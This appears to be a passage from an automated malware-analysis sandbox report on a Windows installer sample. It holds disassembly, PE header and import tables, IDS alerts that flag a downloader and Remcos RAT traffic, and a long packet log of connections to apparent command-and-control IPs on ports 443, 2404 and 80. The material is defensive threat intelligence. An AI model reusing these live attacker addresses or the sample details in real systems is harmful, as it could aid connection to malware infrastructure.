                                                                                                  call dword ptr [004080A8h]
                                                                                                  call dword ptr [004080A4h]
                                                                                                  and eax, BFFFFFFFh
                                                                                                  cmp ax, 00000006h
                                                                                                  mov dword ptr [0042472Ch], eax
                                                                                                  je 00007FDC54FEF053h
                                                                                                  push ebx
                                                                                                  call 00007FDC54FF2142h
                                                                                                  cmp eax, ebx
                                                                                                  je 00007FDC54FEF049h
                                                                                                  push 00000C00h
                                                                                                  call eax
                                                                                                  mov esi, 00408298h
                                                                                                  push esi
                                                                                                  call 00007FDC54FF20BEh
                                                                                                  push esi
                                                                                                  call dword ptr [004080A0h]
                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                  cmp byte ptr [esi], bl
                                                                                                  jne 00007FDC54FEF02Dh
                                                                                                  push 0000000Ah
                                                                                                  call 00007FDC54FF2116h
                                                                                                  push 00000008h
                                                                                                  call 00007FDC54FF210Fh
                                                                                                  push 00000006h
                                                                                                  mov dword ptr [00424724h], eax
                                                                                                  call 00007FDC54FF2103h
                                                                                                  cmp eax, ebx
                                                                                                  je 00007FDC54FEF051h
                                                                                                  push 0000001Eh
                                                                                                  call eax
                                                                                                  test eax, eax
                                                                                                  je 00007FDC54FEF049h
                                                                                                  or byte ptr [0042472Fh], 00000040h
                                                                                                  push ebp
                                                                                                  call dword ptr [00408044h]
                                                                                                  push ebx
                                                                                                  call dword ptr [00408288h]
                                                                                                  mov dword ptr [004247F8h], eax
                                                                                                  push ebx
                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                  push 00000160h
                                                                                                  push eax
                                                                                                  push ebx
                                                                                                  push 0041FCF0h
                                                                                                  call dword ptr [00408178h]
                                                                                                  push 0040A1ECh
                                                                                                  Programming Language:
                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x84280xa0.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c0000x23388.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xcc9d80x910
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x60770x6200de10f6d8b01c12ec29a35514cd8d49daFalse0.6595982142857143data6.403971026647665IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rdata0x80000x12480x1400421f9404c16c75fa4bc7d37da19b3076False0.4287109375data5.044261339836676IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .data0xa0000x1a8380x4009b72314b8d9ad5c72778b00cdf336ee2False0.646484375data5.2244513108529995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .ndata0x250000x170000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rsrc0x3c0000x233880x23400707b5dbe9145b7e62059ccd8e39f2e7dFalse0.21216339760638298data5.2526906205294885IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_ICON0x3c3280x10900Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.17215507075471698
                                                                                                  RT_ICON0x4cc280x9500Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.20918099832214765
                                                                                                  RT_ICON0x561280x4300Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.24638526119402984
                                                                                                  RT_ICON0x5a4280x2600Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.29594983552631576
                                                                                                  RT_ICON0x5ca280x1100Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.3717830882352941
                                                                                                  RT_ICON0x5db280xa00Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.444140625
                                                                                                  RT_ICON0x5e5280x500Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.5515625
                                                                                                  RT_DIALOG0x5ea280x100dataEnglishUnited States0.5234375
                                                                                                  RT_DIALOG0x5eb280x11cdataEnglishUnited States0.6056338028169014
                                                                                                  RT_DIALOG0x5ec480xc4dataEnglishUnited States0.5918367346938775
                                                                                                  RT_DIALOG0x5ed100x60dataEnglishUnited States0.7291666666666666
                                                                                                  RT_GROUP_ICON0x5ed700x68dataEnglishUnited States0.6826923076923077
                                                                                                  RT_VERSION0x5edd80x26cdataEnglishUnited States0.5
                                                                                                  RT_MANIFEST0x5f0480x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                  DLLImport
                                                                                                  KERNEL32.dllSetEnvironmentVariableA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, Sleep, GetTickCount, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, SetCurrentDirectoryA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, GlobalUnlock, GetDiskFreeSpaceA, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                                                                  USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                                                                  ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  EnglishUnited States
                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-12-02T14:43:14.989854+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649769164.160.91.32443TCP
                                                                                                  2024-12-02T14:43:19.623266+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.64978566.63.187.2462404TCP
                                                                                                  2024-12-02T14:43:22.285540+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649793178.237.33.5080TCP
                                                                                                  2024-12-02T14:43:22.420136+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.64979266.63.187.2462404TCP
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 2, 2024 14:43:12.172883034 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:12.172930002 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:12.173002958 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:12.192329884 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:12.192349911 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:14.163763046 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:14.163897991 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:14.247760057 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:14.247795105 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:14.248157024 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:14.248230934 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:14.253143072 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:14.299326897 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:14.989875078 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:14.989937067 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:14.989965916 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:14.990011930 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.218616962 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.218637943 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.218658924 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.218702078 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.218729019 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.218751907 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.218772888 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.271845102 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.271924973 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.271938086 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.271951914 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.272000074 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.454365969 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.454391956 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.454425097 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.454440117 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.454463959 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.454480886 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.494899035 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.494930029 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.494976044 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.494990110 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.495037079 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.536501884 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.536536932 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.536578894 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.536598921 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.536623001 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.536653996 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.660240889 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.660268068 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.660434008 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.660459042 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.660502911 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.692702055 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.692739010 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.692784071 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.692791939 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.692826033 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.722628117 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.722646952 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.722738028 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.722745895 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.722780943 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.752754927 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.752809048 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.752898932 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.752907038 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.753007889 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.778500080 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.778517008 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.778672934 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.778681040 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.778800011 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.810728073 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.810749054 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.810837030 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.810843945 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.810878038 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.875818968 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.875843048 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.875916004 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.875925064 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.875960112 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.897214890 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.897233009 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.897300005 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.897315979 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.897361994 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.913999081 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.914021969 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.914081097 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.914092064 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.914128065 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.924578905 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.924616098 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.924721003 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.924731970 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.924771070 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.933556080 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.933574915 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.933677912 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.933685064 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.933749914 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.943855047 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.943872929 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.943965912 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.943972111 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.944010019 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.953275919 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.953296900 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.953397036 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.953409910 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.953447104 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.963669062 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.963704109 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.963756084 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.963785887 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:15.963810921 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:15.963823080 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.081265926 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.081285954 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.081384897 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.081404924 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.081453085 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.101130009 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.101150990 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.101228952 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.101238966 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.101274967 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.117502928 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.117520094 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.117588997 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.117604971 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.117645979 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.124052048 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.124104023 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.124128103 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.124134064 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.124160051 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.124177933 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.130604982 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.130645990 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.130732059 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.130739927 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.130779982 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.136437893 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.136464119 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.136519909 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.136531115 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.136567116 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.143019915 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.143037081 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.143100977 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.143115044 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.143155098 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.149138927 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.149158955 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.149224997 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.149235010 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.149272919 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.289750099 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.289777994 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.289891958 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.289921999 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.289978981 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.309770107 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.309792042 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.309901953 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.309920073 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.309967041 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.326250076 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.326267958 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.326381922 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.326395988 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.326540947 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.327186108 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.327240944 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.327246904 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.327255964 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.327291965 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.327399969 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.327414036 CET44349769164.160.91.32192.168.2.6
                                                                                                  Dec 2, 2024 14:43:16.327423096 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:16.327455997 CET49769443192.168.2.6164.160.91.32
                                                                                                  Dec 2, 2024 14:43:17.945807934 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:18.065880060 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:18.066026926 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:18.069885969 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:18.190707922 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:19.579838991 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:19.623265982 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:19.823682070 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:19.873281002 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:19.896198988 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:20.016407013 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:20.016467094 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:20.136673927 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:20.570250034 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:20.571754932 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:20.691742897 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:20.770957947 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:20.773220062 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:20.810795069 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:20.893343925 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:20.893419981 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:20.897433996 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:20.916491985 CET4979380192.168.2.6178.237.33.50
                                                                                                  Dec 2, 2024 14:43:21.017472982 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:21.036545992 CET8049793178.237.33.50192.168.2.6
                                                                                                  Dec 2, 2024 14:43:21.037830114 CET4979380192.168.2.6178.237.33.50
                                                                                                  Dec 2, 2024 14:43:21.038033962 CET4979380192.168.2.6178.237.33.50
                                                                                                  Dec 2, 2024 14:43:21.158591032 CET8049793178.237.33.50192.168.2.6
                                                                                                  Dec 2, 2024 14:43:22.285468102 CET8049793178.237.33.50192.168.2.6
                                                                                                  Dec 2, 2024 14:43:22.285540104 CET4979380192.168.2.6178.237.33.50
                                                                                                  Dec 2, 2024 14:43:22.305154085 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:22.372278929 CET24044979266.63.187.246192.168.2.6
